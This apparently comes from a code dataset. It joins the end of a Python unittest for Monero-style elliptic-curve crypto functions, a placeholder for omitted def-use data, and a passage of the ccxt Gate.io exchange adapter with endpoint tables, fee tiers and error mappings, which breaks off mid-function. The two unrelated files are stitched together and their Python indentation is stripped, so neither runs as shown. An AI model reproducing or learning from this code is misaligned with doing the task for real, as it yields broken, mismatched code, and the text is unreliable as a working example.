crypto.encodepoint(crypto.generate_key_derivation(key_pub, key_priv)),
)
def test_h(self):
H = unhexlify(
b"8b655970153799af2aeadc9ff1add0ea6c7251d54154cfa92c173a0dd39c1f94"
)
self.assertEqual(crypto.encodepoint(crypto.xmr_H()), H)
def test_h_pow(self):
hp = crypto.gen_Hpow(10)
self.assertEqual(crypto.encodepoint(hp[0]), crypto.encodepoint(crypto.xmr_H()))
for i in range(1, 10):
crypto.check_ed25519point(hp[i])
self.assertEqual(
crypto.encodepoint(hp[i]),
crypto.encodepoint(
crypto.scalarmult(crypto.xmr_H(), crypto.sc_init(2 ** i))
),
)
def test_signature(self):
for i in range(10):
priv = crypto.random_scalar()
data = crypto.cn_fast_hash(bytes(bytearray([i])))
c, r, pub = crypto.generate_signature(data, priv)
res = crypto.check_signature(data, c, r, pub)
self.assertEqual(res, 1)
res2 = crypto.check_signature(
data, crypto.sc_add(c, crypto.sc_init(1)), r, pub
)
self.assertEqual(res2, 0)
def test_edhex(self):
inputs = [crypto.q - 2 ** 9, crypto.q - 10, 0, 100, 2 ** 200 + 10] + [
common.rand.randrange(0, crypto.q - 2) for _ in range(20)
]
for x in inputs:
l = crypto.encode_ed25519(x)
d = crypto.decode_ed25519(l)
self.assertEqual(x, d)
def test_modm(self):
inputs = [crypto.l - 2 ** 9, crypto.l - 10, 0, 100, 2 ** 200 + 10] + [
common.rand.randrange(0, crypto.l - 2) for _ in range(20)
]
for x in inputs:
l = crypto.encode_modm(x)
d = crypto.decode_modm(l)
self.assertEqual(x, d)
def test_ge25519_double_scalarmult_vartime2(self):
for i in range(10):
ap = crypto.random_scalar()
bp = crypto.random_scalar()
A = crypto.scalarmult_base(ap)
B = crypto.scalarmult_base(bp)
a = crypto.random_scalar()
b = crypto.random_scalar()
R = crypto.ge_double_scalarmult_base_vartime2(a, A, b, B)
R_exp = crypto.point_add(crypto.scalarmult(A, a), crypto.scalarmult(B, b))
self.assertTrue(crypto.point_eq(R, R_exp))
def test_ge25519_double_scalarmult_vartime(self):
for i in range(10):
ap = crypto.random_scalar()
A = crypto.scalarmult_base(ap)
a = crypto.random_scalar()
b = crypto.random_scalar()
R = crypto.ge_double_scalarmult_base_vartime(a, A, b)
R_exp = crypto.point_add(crypto.scalarmult(A, a), crypto.scalarmult_base(b))
self.assertTrue(crypto.point_eq(R, R_exp))
def test_pointadd(self):
a = crypto.random_scalar()
A = crypto.scalarmult_base(a)
A2 = crypto.point_add(A, A)
A3 = crypto.point_add(A2, A)
A4 = crypto.point_add(A3, A)
A8 = crypto.scalarmult(A4, crypto.sc_init(2))
A8p = crypto.point_mul8(A)
self.assertTrue(crypto.point_eq(A8p, A8))
self.assertTrue(crypto.point_eq(A4, crypto.scalarmult(A, crypto.sc_init(4))))
self.assertTrue(crypto.point_eq(A3, crypto.scalarmult(A, crypto.sc_init(3))))
def test_sc_inversion(self):
res = crypto.new_scalar()
inp = crypto.decodeint(
unhexlify(
b"3482fb9735ef879fcae5ec7721b5d3646e155c4fb58d6cc11c732c9c9b76620a"
)
)
crypto.sc_inv_into(res, inp)
self.assertEqual(
binascii.hexlify(crypto.encodeint(res)),
b"bcf365a551e6358f3f281a6241d4a25eded60230b60a1d48c67b51a85e33d70e",
)
if __name__ == "__main__":
unittest.main() # pragma: no cover
 | [def_use_chains data omitted: long nested list of integer offset pairs] |
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.base.exchange import Exchange
import hashlib
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import AccountNotEnabled
from ccxt.base.errors import AccountSuspended
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import NotSupported
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class gateio(Exchange):
def describe(self):
return self.deep_extend(super(gateio, self).describe(), {
'id': 'gateio',
'name': 'Gate.io',
'countries': ['KR'],
'rateLimit': 10 / 3, # 300 requests per second or 3.33ms
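            # Note: in ccxt, rateLimit is the minimum delay in milliseconds between
            # requests, so 10 / 3 ≈ 3.33ms corresponds to roughly 300 requests per
            # second; the per-endpoint cost weights declared under 'api' below are
            # multiplied by this value when throttling.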
'version': 'v4',
'certified': True,
'pro': True,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/31784029-0313c702-b509-11e7-9ccc-bc0da6a0e435.jpg',
'doc': 'https://www.gate.io/docs/apiv4/en/index.html',
'www': 'https://gate.io/',
'api': {
'public': {
'wallet': 'https://api.gateio.ws/api/v4',
'futures': 'https://api.gateio.ws/api/v4',
'margin': 'https://api.gateio.ws/api/v4',
'delivery': 'https://api.gateio.ws/api/v4',
'spot': 'https://api.gateio.ws/api/v4',
'options': 'https://api.gateio.ws/api/v4',
},
'private': {
'withdrawals': 'https://api.gateio.ws/api/v4',
'wallet': 'https://api.gateio.ws/api/v4',
'futures': 'https://api.gateio.ws/api/v4',
'margin': 'https://api.gateio.ws/api/v4',
'delivery': 'https://api.gateio.ws/api/v4',
'spot': 'https://api.gateio.ws/api/v4',
'options': 'https://api.gateio.ws/api/v4',
},
},
'test': {
'public': {
'futures': 'https://fx-api-testnet.gateio.ws/api/v4',
'delivery': 'https://fx-api-testnet.gateio.ws/api/v4',
},
'private': {
'futures': 'https://fx-api-testnet.gateio.ws/api/v4',
'delivery': 'https://fx-api-testnet.gateio.ws/api/v4',
},
},
'referral': {
'url': 'https://www.gate.io/ref/2436035',
'discount': 0.2,
},
},
'has': {
'CORS': None,
'spot': True,
'margin': True,
'swap': True,
'future': True,
'option': None,
'cancelAllOrders': True,
'cancelOrder': True,
'createMarketOrder': False,
'createOrder': True,
'createPostOnlyOrder': True,
'createStopLimitOrder': True,
'createStopMarketOrder': False,
'createStopOrder': True,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRateHistories': False,
'fetchBorrowRateHistory': False,
'fetchBorrowRates': False,
'fetchClosedOrders': True,
'fetchCurrencies': True,
'fetchDepositAddress': True,
'fetchDeposits': True,
'fetchFundingHistory': True,
'fetchFundingRate': True,
'fetchFundingRateHistory': True,
'fetchFundingRates': True,
'fetchIndexOHLCV': True,
'fetchLeverage': False,
'fetchLeverageTiers': True,
'fetchMarketLeverageTiers': 'emulated',
'fetchMarkets': True,
'fetchMarkOHLCV': True,
'fetchMyTrades': True,
'fetchNetworkDepositAddress': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchPositions': True,
'fetchPremiumIndexOHLCV': False,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': False,
'fetchTrades': True,
'fetchTradingFee': True,
'fetchTradingFees': True,
'fetchTransactionFees': True,
'fetchWithdrawals': True,
'setLeverage': True,
'setMarginMode': False,
'transfer': True,
'withdraw': True,
},
'api': {
'public': {
'wallet': {
'get': {
'wallet/currency_chains': 1.5,
},
},
'spot': {
'get': {
'currencies': 1,
'currencies/{currency}': 1,
'currency_pairs': 1,
'currency_pairs/{currency_pair}': 1,
'tickers': 1,
'order_book': 1,
'trades': 1,
'candlesticks': 1,
},
},
'margin': {
'get': {
'currency_pairs': 1,
'currency_pairs/{currency_pair}': 1,
'cross/currencies': 1,
'cross/currencies/{currency}': 1,
'funding_book': 1,
},
},
'futures': {
'get': {
'{settle}/contracts': 1.5,
'{settle}/contracts/{contract}': 1.5,
'{settle}/order_book': 1.5,
'{settle}/trades': 1.5,
'{settle}/candlesticks': 1.5,
'{settle}/tickers': 1.5,
'{settle}/funding_rate': 1.5,
'{settle}/insurance': 1.5,
'{settle}/contract_stats': 1.5,
'{settle}/liq_orders': 1.5,
},
},
'delivery': {
'get': {
'{settle}/contracts': 1.5,
'{settle}/contracts/{contract}': 1.5,
'{settle}/order_book': 1.5,
'{settle}/trades': 1.5,
'{settle}/candlesticks': 1.5,
'{settle}/tickers': 1.5,
'{settle}/insurance': 1.5,
},
},
'options': {
'get': {
'underlyings': 1.5,
'expirations': 1.5,
'contracts': 1.5,
'contracts/{contract}': 1.5,
'settlements': 1.5,
'settlements/{contract}': 1.5,
'order_book': 1.5,
'tickers': 1.5,
'underlying/tickers/{underlying}': 1.5,
'candlesticks': 1.5,
'underlying/candlesticks': 1.5,
'trades': 1.5,
},
},
},
'private': {
'withdrawals': {
'post': {
'': 3000, # 3000 = 10 seconds
},
'delete': {
'{withdrawal_id}': 300,
},
},
'wallet': {
'get': {
'deposit_address': 300,
'withdrawals': 300,
'deposits': 300,
'sub_account_transfers': 300,
'withdraw_status': 300,
'sub_account_balances': 300,
'fee': 300,
'total_balance': 300,
},
'post': {
'transfers': 300,
'sub_account_transfers': 300,
},
},
'spot': {
'get': {
'accounts': 1,
'open_orders': 1,
'orders': 1,
'orders/{order_id}': 1,
'my_trades': 1,
'price_orders': 1,
'price_orders/{order_id}': 1,
},
'post': {
'batch_orders': 1,
'orders': 1,
'cancel_batch_orders': 1,
'price_orders': 1,
},
'delete': {
'orders': 1,
'orders/{order_id}': 1,
'price_orders': 1,
'price_orders/{order_id}': 1,
},
},
'margin': {
'get': {
'accounts': 1.5,
'account_book': 1.5,
'funding_accounts': 1.5,
'loans': 1.5,
'loans/{loan_id}': 1.5,
'loans/{loan_id}/repayment': 1.5,
'loan_records': 1.5,
'loan_records/{load_record_id}': 1.5,
'auto_repay': 1.5,
'transferable': 1.5,
'cross/accounts': 1.5,
'cross/account_book': 1.5,
'cross/loans': 1.5,
'cross/loans/{loan_id}': 1.5,
'cross/loans/repayments': 1.5,
'cross/transferable': 1.5,
'loan_records/{loan_record_id}': 1.5,
'borrowable': 1.5,
'cross/repayments': 1.5,
'cross/borrowable': 1.5,
},
'post': {
'loans': 1.5,
'merged_loans': 1.5,
'loans/{loan_id}/repayment': 1.5,
'auto_repay': 1.5,
'cross/loans': 1.5,
'cross/loans/repayments': 1.5,
'cross/repayments': 1.5,
},
'patch': {
'loans/{loan_id}': 1.5,
'loan_records/{loan_record_id}': 1.5,
},
'delete': {
'loans/{loan_id}': 1.5,
},
},
'futures': {
'get': {
'{settle}/accounts': 1.5,
'{settle}/account_book': 1.5,
'{settle}/positions': 1.5,
'{settle}/positions/{contract}': 1.5,
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/my_trades': 1.5,
'{settle}/position_close': 1.5,
'{settle}/liquidates': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
'{settle}/dual_comp/positions/{contract}': 1.5,
},
'post': {
'{settle}/positions/{contract}/margin': 1.5,
'{settle}/positions/{contract}/leverage': 1.5,
'{settle}/positions/{contract}/risk_limit': 1.5,
'{settle}/dual_mode': 1.5,
'{settle}/dual_comp/positions/{contract}': 1.5,
'{settle}/dual_comp/positions/{contract}/margin': 1.5,
'{settle}/dual_comp/positions/{contract}/leverage': 1.5,
'{settle}/dual_comp/positions/{contract}/risk_limit': 1.5,
'{settle}/orders': 1.5,
'{settle}/price_orders': 1.5,
},
'delete': {
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
},
'delivery': {
'get': {
'{settle}/accounts': 1.5,
'{settle}/account_book': 1.5,
'{settle}/positions': 1.5,
'{settle}/positions/{contract}': 1.5,
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/my_trades': 1.5,
'{settle}/position_close': 1.5,
'{settle}/liquidates': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
'{settle}/settlements': 1.5,
},
'post': {
'{settle}/positions/{contract}/margin': 1.5,
'{settle}/positions/{contract}/leverage': 1.5,
'{settle}/positions/{contract}/risk_limit': 1.5,
'{settle}/orders': 1.5,
'{settle}/price_orders': 1.5,
},
'delete': {
'{settle}/orders': 1.5,
'{settle}/orders/{order_id}': 1.5,
'{settle}/price_orders': 1.5,
'{settle}/price_orders/{order_id}': 1.5,
},
},
'options': {
'get': {
'accounts': 1.5,
'account_book': 1.5,
'positions': 1.5,
'positions/{contract}': 1.5,
'position_close': 1.5,
'orders': 1.5,
'orders/{order_id}': 1.5,
'my_trades': 1.5,
},
'post': {
'orders': 1.5,
},
'delete': {
'orders': 1.5,
'orders/{order_id}': 1.5,
},
},
},
},
'timeframes': {
'10s': '10s',
'1m': '1m',
'5m': '5m',
'15m': '15m',
'30m': '30m',
'1h': '1h',
'4h': '4h',
'8h': '8h',
'1d': '1d',
'7d': '7d',
'1w': '7d',
},
# copied from gateiov2
'commonCurrencies': {
'88MPH': 'MPH',
'AXIS': 'Axis DeFi',
'BIFI': 'Bitcoin File',
'BOX': 'DefiBox',
'BTCBEAR': 'BEAR',
'BTCBULL': 'BULL',
'BYN': 'BeyondFi',
'EGG': 'Goose Finance',
'GTC': 'Game.com', # conflict with Gitcoin and Gastrocoin
'GTC_HT': 'Game.com HT',
'GTC_BSC': 'Game.com BSC',
'HIT': 'HitChain',
'MM': 'Million', # conflict with MilliMeter
'MPH': 'Morpher', # conflict with 88MPH
'RAI': 'Rai Reflex Index', # conflict with RAI Finance
'SBTC': 'Super Bitcoin',
'TNC': 'Trinity Network Credit',
'TON': 'TONToken',
'VAI': 'VAIOT',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
},
'headers': {
'X-Gate-Channel-Id': 'ccxt',
},
'options': {
'createOrder': {
'expiration': 86400, # for conditional orders
},
'networks': {
'TRC20': 'TRX',
'ERC20': 'ETH',
'BEP20': 'BSC',
},
'accountsByType': {
'funding': 'spot',
'spot': 'spot',
'margin': 'margin',
'cross_margin': 'cross_margin',
'cross': 'cross_margin',
'isolated': 'margin',
'swap': 'futures',
'future': 'delivery',
'futures': 'futures',
'delivery': 'delivery',
},
'defaultType': 'spot',
'swap': {
'fetchMarkets': {
'settlementCurrencies': ['usdt', 'btc'],
},
},
'future': {
'fetchMarkets': {
'settlementCurrencies': ['usdt', 'btc'],
},
},
},
'precisionMode': TICK_SIZE,
'fees': {
'trading': {
'tierBased': True,
'feeSide': 'get',
'percentage': True,
'maker': self.parse_number('0.002'),
'taker': self.parse_number('0.002'),
'tiers': {
# volume is in BTC
'maker': [
[self.parse_number('0'), self.parse_number('0.002')],
[self.parse_number('1.5'), self.parse_number('0.00185')],
[self.parse_number('3'), self.parse_number('0.00175')],
[self.parse_number('6'), self.parse_number('0.00165')],
[self.parse_number('12.5'), self.parse_number('0.00155')],
[self.parse_number('25'), self.parse_number('0.00145')],
[self.parse_number('75'), self.parse_number('0.00135')],
[self.parse_number('200'), self.parse_number('0.00125')],
[self.parse_number('500'), self.parse_number('0.00115')],
[self.parse_number('1250'), self.parse_number('0.00105')],
[self.parse_number('2500'), self.parse_number('0.00095')],
[self.parse_number('3000'), self.parse_number('0.00085')],
[self.parse_number('6000'), self.parse_number('0.00075')],
[self.parse_number('11000'), self.parse_number('0.00065')],
[self.parse_number('20000'), self.parse_number('0.00055')],
[self.parse_number('40000'), self.parse_number('0.00055')],
[self.parse_number('75000'), self.parse_number('0.00055')],
],
'taker': [
[self.parse_number('0'), self.parse_number('0.002')],
[self.parse_number('1.5'), self.parse_number('0.00195')],
[self.parse_number('3'), self.parse_number('0.00185')],
[self.parse_number('6'), self.parse_number('0.00175')],
[self.parse_number('12.5'), self.parse_number('0.00165')],
[self.parse_number('25'), self.parse_number('0.00155')],
[self.parse_number('75'), self.parse_number('0.00145')],
[self.parse_number('200'), self.parse_number('0.00135')],
[self.parse_number('500'), self.parse_number('0.00125')],
[self.parse_number('1250'), self.parse_number('0.00115')],
[self.parse_number('2500'), self.parse_number('0.00105')],
[self.parse_number('3000'), self.parse_number('0.00095')],
[self.parse_number('6000'), self.parse_number('0.00085')],
[self.parse_number('11000'), self.parse_number('0.00075')],
[self.parse_number('20000'), self.parse_number('0.00065')],
[self.parse_number('40000'), self.parse_number('0.00065')],
[self.parse_number('75000'), self.parse_number('0.00065')],
],
},
},
'swap': {
'tierBased': True,
'feeSide': 'base',
'percentage': True,
'maker': self.parse_number('0.0'),
'taker': self.parse_number('0.0005'),
'tiers': {
'maker': [
[self.parse_number('0'), self.parse_number('0.0000')],
[self.parse_number('1.5'), self.parse_number('-0.00005')],
[self.parse_number('3'), self.parse_number('-0.00005')],
[self.parse_number('6'), self.parse_number('-0.00005')],
[self.parse_number('12.5'), self.parse_number('-0.00005')],
[self.parse_number('25'), self.parse_number('-0.00005')],
[self.parse_number('75'), self.parse_number('-0.00005')],
[self.parse_number('200'), self.parse_number('-0.00005')],
[self.parse_number('500'), self.parse_number('-0.00005')],
[self.parse_number('1250'), self.parse_number('-0.00005')],
[self.parse_number('2500'), self.parse_number('-0.00005')],
[self.parse_number('3000'), self.parse_number('-0.00008')],
[self.parse_number('6000'), self.parse_number('-0.01000')],
[self.parse_number('11000'), self.parse_number('-0.01002')],
[self.parse_number('20000'), self.parse_number('-0.01005')],
[self.parse_number('40000'), self.parse_number('-0.02000')],
[self.parse_number('75000'), self.parse_number('-0.02005')],
],
'taker': [
[self.parse_number('0'), self.parse_number('0.00050')],
[self.parse_number('1.5'), self.parse_number('0.00048')],
[self.parse_number('3'), self.parse_number('0.00046')],
[self.parse_number('6'), self.parse_number('0.00044')],
[self.parse_number('12.5'), self.parse_number('0.00042')],
[self.parse_number('25'), self.parse_number('0.00040')],
[self.parse_number('75'), self.parse_number('0.00038')],
[self.parse_number('200'), self.parse_number('0.00036')],
[self.parse_number('500'), self.parse_number('0.00034')],
[self.parse_number('1250'), self.parse_number('0.00032')],
[self.parse_number('2500'), self.parse_number('0.00030')],
[self.parse_number('3000'), self.parse_number('0.00030')],
[self.parse_number('6000'), self.parse_number('0.00030')],
[self.parse_number('11000'), self.parse_number('0.00030')],
[self.parse_number('20000'), self.parse_number('0.00030')],
[self.parse_number('40000'), self.parse_number('0.00030')],
[self.parse_number('75000'), self.parse_number('0.00030')],
],
},
},
},
# https://www.gate.io/docs/apiv4/en/index.html#label-list
'exceptions': {
'exact': {
'INVALID_PARAM_VALUE': BadRequest,
'INVALID_PROTOCOL': BadRequest,
'INVALID_ARGUMENT': BadRequest,
'INVALID_REQUEST_BODY': BadRequest,
'MISSING_REQUIRED_PARAM': ArgumentsRequired,
'BAD_REQUEST': BadRequest,
'INVALID_CONTENT_TYPE': BadRequest,
'NOT_ACCEPTABLE': BadRequest,
'METHOD_NOT_ALLOWED': BadRequest,
'NOT_FOUND': ExchangeError,
'INVALID_CREDENTIALS': AuthenticationError,
'INVALID_KEY': AuthenticationError,
'IP_FORBIDDEN': AuthenticationError,
'READ_ONLY': PermissionDenied,
'INVALID_SIGNATURE': AuthenticationError,
'MISSING_REQUIRED_HEADER': AuthenticationError,
'REQUEST_EXPIRED': AuthenticationError,
'ACCOUNT_LOCKED': AccountSuspended,
'FORBIDDEN': PermissionDenied,
'SUB_ACCOUNT_NOT_FOUND': ExchangeError,
'SUB_ACCOUNT_LOCKED': AccountSuspended,
'MARGIN_BALANCE_EXCEPTION': ExchangeError,
'MARGIN_TRANSFER_FAILED': ExchangeError,
'TOO_MUCH_FUTURES_AVAILABLE': ExchangeError,
'FUTURES_BALANCE_NOT_ENOUGH': InsufficientFunds,
'ACCOUNT_EXCEPTION': ExchangeError,
'SUB_ACCOUNT_TRANSFER_FAILED': ExchangeError,
'ADDRESS_NOT_USED': ExchangeError,
'TOO_FAST': RateLimitExceeded,
'WITHDRAWAL_OVER_LIMIT': ExchangeError,
'API_WITHDRAW_DISABLED': ExchangeNotAvailable,
'INVALID_WITHDRAW_ID': ExchangeError,
'INVALID_WITHDRAW_CANCEL_STATUS': ExchangeError,
'INVALID_PRECISION': InvalidOrder,
'INVALID_CURRENCY': BadSymbol,
'INVALID_CURRENCY_PAIR': BadSymbol,
'POC_FILL_IMMEDIATELY': ExchangeError,
'ORDER_NOT_FOUND': OrderNotFound,
'CLIENT_ID_NOT_FOUND': OrderNotFound,
'ORDER_CLOSED': InvalidOrder,
'ORDER_CANCELLED': InvalidOrder,
'QUANTITY_NOT_ENOUGH': InvalidOrder,
'BALANCE_NOT_ENOUGH': InsufficientFunds,
'MARGIN_NOT_SUPPORTED': InvalidOrder,
'MARGIN_BALANCE_NOT_ENOUGH': InsufficientFunds,
'AMOUNT_TOO_LITTLE': InvalidOrder,
'AMOUNT_TOO_MUCH': InvalidOrder,
'REPEATED_CREATION': InvalidOrder,
'LOAN_NOT_FOUND': OrderNotFound,
'LOAN_RECORD_NOT_FOUND': OrderNotFound,
'NO_MATCHED_LOAN': ExchangeError,
'NOT_MERGEABLE': ExchangeError,
'NO_CHANGE': ExchangeError,
'REPAY_TOO_MUCH': ExchangeError,
'TOO_MANY_CURRENCY_PAIRS': InvalidOrder,
'TOO_MANY_ORDERS': InvalidOrder,
'MIXED_ACCOUNT_TYPE': InvalidOrder,
'AUTO_BORROW_TOO_MUCH': ExchangeError,
'TRADE_RESTRICTED': InsufficientFunds,
'USER_NOT_FOUND': AccountNotEnabled,
'CONTRACT_NO_COUNTER': ExchangeError,
'CONTRACT_NOT_FOUND': BadSymbol,
'RISK_LIMIT_EXCEEDED': ExchangeError,
'INSUFFICIENT_AVAILABLE': InsufficientFunds,
'LIQUIDATE_IMMEDIATELY': InvalidOrder,
'LEVERAGE_TOO_HIGH': InvalidOrder,
'LEVERAGE_TOO_LOW': InvalidOrder,
'ORDER_NOT_OWNED': ExchangeError,
'ORDER_FINISHED': ExchangeError,
'POSITION_CROSS_MARGIN': ExchangeError,
'POSITION_IN_LIQUIDATION': ExchangeError,
'POSITION_IN_CLOSE': ExchangeError,
'POSITION_EMPTY': InvalidOrder,
'REMOVE_TOO_MUCH': ExchangeError,
'RISK_LIMIT_NOT_MULTIPLE': ExchangeError,
'RISK_LIMIT_TOO_HIGH': ExchangeError,
'RISK_LIMIT_TOO_lOW': ExchangeError,
'PRICE_TOO_DEVIATED': InvalidOrder,
'SIZE_TOO_LARGE': InvalidOrder,
'SIZE_TOO_SMALL': InvalidOrder,
'PRICE_OVER_LIQUIDATION': InvalidOrder,
'PRICE_OVER_BANKRUPT': InvalidOrder,
'ORDER_POC_IMMEDIATE': InvalidOrder,
'INCREASE_POSITION': InvalidOrder,
'CONTRACT_IN_DELISTING': ExchangeError,
'INTERNAL': ExchangeNotAvailable,
'SERVER_ERROR': ExchangeNotAvailable,
'TOO_BUSY': ExchangeNotAvailable,
'CROSS_ACCOUNT_NOT_FOUND': ExchangeError,
},
},
'broad': {},
})
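    # Illustrative usage sketch (not part of the generated source): the class above is
    # normally consumed through ccxt's async API, assuming the standard entry points:
    #
    #     import asyncio
    #     import ccxt.async_support as ccxt
    #
    #     async def main():
    #         exchange = ccxt.gateio({'apiKey': 'YOUR_KEY', 'secret': 'YOUR_SECRET'})
    #         markets = await exchange.load_markets()
    #         print(len(markets))
    #         await exchange.close()
    #
    #     asyncio.run(main())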
async def fetch_markets(self, params={}):
result = []
type, query = self.handle_market_type_and_params('fetchMarkets', None, params)
if type == 'spot' or type == 'margin':
result = await self.fetch_spot_markets(query)
if type == 'swap' or type == 'future':
result = await self.fetch_contract_markets(query) # futures and swaps
if type == 'option':
result = await self.fetch_option_markets(query)
resultLength = len(result)
if resultLength == 0:
raise ExchangeError(self.id + " does not support '" + type + "' type, set exchange.options['defaultType'] to " + "'spot', 'margin', 'swap', 'future' or 'option'") # eslint-disable-line quotes
return result
async def fetch_spot_markets(self, params):
marginResponse = await self.publicMarginGetCurrencyPairs(params)
spotMarketsResponse = await self.publicSpotGetCurrencyPairs(params)
marginMarkets = self.index_by(marginResponse, 'id')
#
# Spot
#
# [
# {
# "id": "QTUM_ETH",
# "base": "QTUM",
# "quote": "ETH",
# "fee": "0.2",
# "min_base_amount": "0.01",
# "min_quote_amount": "0.001",
# "amount_precision": 3,
# "precision": 6,
# "trade_status": "tradable",
# "sell_start": 0,
# "buy_start": 0
# }
# ]
#
# Margin
#
# [
# {
# "id": "ETH_USDT",
# "base": "ETH",
# "quote": "USDT",
# "leverage": 3,
# "min_base_amount": "0.01",
# "min_quote_amount": "100",
# "max_quote_amount": "1000000"
# }
# ]
#
result = []
for i in range(0, len(spotMarketsResponse)):
spotMarket = spotMarketsResponse[i]
id = self.safe_string(spotMarket, 'id')
marginMarket = self.safe_value(marginMarkets, id)
market = self.deep_extend(marginMarket, spotMarket)
baseId, quoteId = id.split('_')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
takerPercent = self.safe_string(market, 'fee')
makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent)
amountPrecisionString = self.safe_string(market, 'amount_precision')
pricePrecisionString = self.safe_string(market, 'precision')
tradeStatus = self.safe_string(market, 'trade_status')
leverage = self.safe_number(market, 'leverage')
defaultMinAmountLimit = self.parse_number(self.parse_precision(amountPrecisionString))
margin = leverage is not None
result.append({
'id': id,
'symbol': base + '/' + quote,
'base': base,
'quote': quote,
'settle': None,
'baseId': baseId,
'quoteId': quoteId,
'settleId': None,
'type': 'spot',
'spot': True,
'margin': margin,
'swap': False,
'future': False,
'option': False,
'active': (tradeStatus == 'tradable'),
'contract': False,
'linear': None,
'inverse': None,
# Fee is in %, so divide by 100
'taker': self.parse_number(Precise.string_div(takerPercent, '100')),
'maker': self.parse_number(Precise.string_div(makerPercent, '100')),
'contractSize': None,
'expiry': None,
'expiryDatetime': None,
'strike': None,
'optionType': None,
'precision': {
'amount': self.parse_number(self.parse_precision(amountPrecisionString)),
'price': self.parse_number(self.parse_precision(pricePrecisionString)),
},
'limits': {
'leverage': {
'min': self.parse_number('1'),
'max': self.safe_number(market, 'leverage', 1),
},
'amount': {
'min': self.safe_number(spotMarket, 'min_base_amount', defaultMinAmountLimit),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(market, 'min_quote_amount'),
'max': self.safe_number(market, 'max_quote_amount'),
},
},
'info': market,
})
return result
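        # Note: with 'precisionMode' set to TICK_SIZE above, parse_precision() turns the
        # decimal-places counts returned by the API (e.g. "amount_precision": 3) into
        # tick sizes (0.001), which the unified 'precision' values and the default
        # minimum amount limit are built from.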
async def fetch_contract_markets(self, params):
result = []
swapSettlementCurrencies = self.get_settlement_currencies('swap', 'fetchMarkets')
futureSettlementCurrencies = self.get_settlement_currencies('future', 'fetchMarkets')
for c in range(0, len(swapSettlementCurrencies)):
settleId = swapSettlementCurrencies[c]
query = params
query['settle'] = settleId
response = await self.publicFuturesGetSettleContracts(query)
for i in range(0, len(response)):
parsedMarket = self.parse_contract_market(response[i], settleId)
result.append(parsedMarket)
for c in range(0, len(futureSettlementCurrencies)):
settleId = futureSettlementCurrencies[c]
query = params
query['settle'] = settleId
response = await self.publicDeliveryGetSettleContracts(query)
for i in range(0, len(response)):
parsedMarket = self.parse_contract_market(response[i], settleId)
result.append(parsedMarket)
return result
def parse_contract_market(self, market, settleId):
#
# Perpetual swap
#
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
#
# Delivery Futures
#
# {
# "name": "BTC_USDT_20200814",
# "underlying": "BTC_USDT",
# "cycle": "WEEKLY",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "mark_type": "index",
# "last_price": "9017",
# "mark_price": "9019",
# "index_price": "9005.3",
# "basis_rate": "0.185095",
# "basis_value": "13.7",
# "basis_impact_value": "100000",
# "settle_price": "0",
# "settle_price_interval": 60,
# "settle_price_duration": 1800,
# "settle_fee_rate": "0.0015",
# "expire_time": 1593763200,
# "order_price_round": "0.1",
# "mark_price_round": "0.1",
# "leverage_min": "1",
# "leverage_max": "100",
# "maintenance_rate": "1000000",
# "risk_limit_base": "140.726652109199",
# "risk_limit_step": "1000000",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "ref_discount_rate": "0",
# "ref_rebate_rate": "0.2",
# "order_price_deviate": "0.5",
# "order_size_min": 1,
# "order_size_max": 1000000,
# "orders_limit": 50,
# "orderbook_id": 63,
# "trade_id": 26,
# "trade_size": 435,
# "position_size": 130,
# "config_change_time": 1593158867,
# "in_delisting": False
# }
#
id = self.safe_string(market, 'name')
parts = id.split('_')
baseId = self.safe_string(parts, 0)
quoteId = self.safe_string(parts, 1)
date = self.safe_string(parts, 2)
base = self.safe_currency_code(baseId)
